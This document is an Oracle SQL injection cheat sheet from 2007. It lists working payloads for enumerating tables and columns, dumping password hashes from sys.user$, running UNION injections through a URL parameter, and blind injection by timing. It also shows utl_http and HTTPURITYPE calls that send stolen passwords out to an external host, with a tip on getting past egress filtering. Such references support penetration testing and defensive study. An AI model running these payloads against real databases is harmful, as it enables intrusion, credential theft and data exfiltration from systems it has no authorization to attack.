ORACLE SQL Injection Cheat Sheet

• Introduction
• ORACLE SQL Injection Notes
• Concatenation
• Comments
• Casting
• Strings without Quotes
• Getting Stuff
  • Getting Tables
  • Getting Columns
  • Getting Current Database Name
  • Getting Users and Passwords
  • Getting Version
  • Getting Current User
• Simple Union Query
• Simulating SQL Server's TOP feature
• Moving Records one by one
• Functions useful for Blind SQL Injection
• Doing outbound connections
• References, Credits, Thanks & Document History

Introduction

Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.

ORACLE SQL Injection Notes

In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.

i.e. SELECT 'dummydata' || 'x' FROM DUAL;

You have to close comments if you used /* comment */ style comments

Concatenation

SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;

Comments

/* comment */

Note : You have to close this comments properly otherwise you'll get syntax error.

Line comment : --

Casting

For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;

Strings without quotes

SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;

Getting Stuff

Getting Tables

SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'

Getting Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'

Getting Current Database Name

SELECT global_name FROM global_name

Getting Users and Passwords

SELECT name, password FROM sys.user$ where type#=1

Getting version

Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'

Getting Current User

SELECT user FROM dual

Simple Union Query

http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL

Simulating SQL Server's TOP feature

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;

Moving Records one by one

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;

Functions useful for Blind SQL Injetion

• BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
• CHR() - Convert to Char
• ASCII() - Convert to ASCII
• SUBSTR() - Substring
• BITAND() - Bit And operation
• LOWER() - Convert to LowerCase

Doing outbound connections 

• SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
• SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;

You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.

References, Papers & Credits

• Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
• SQL Injection Attacks for ORACLE Developers
• Red Database Security Papers 
• SQL Injection Cheat Sheet

Document History

• 02/10/2007 - Public Release
• 02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
• 09/10/2007 - Sleep function added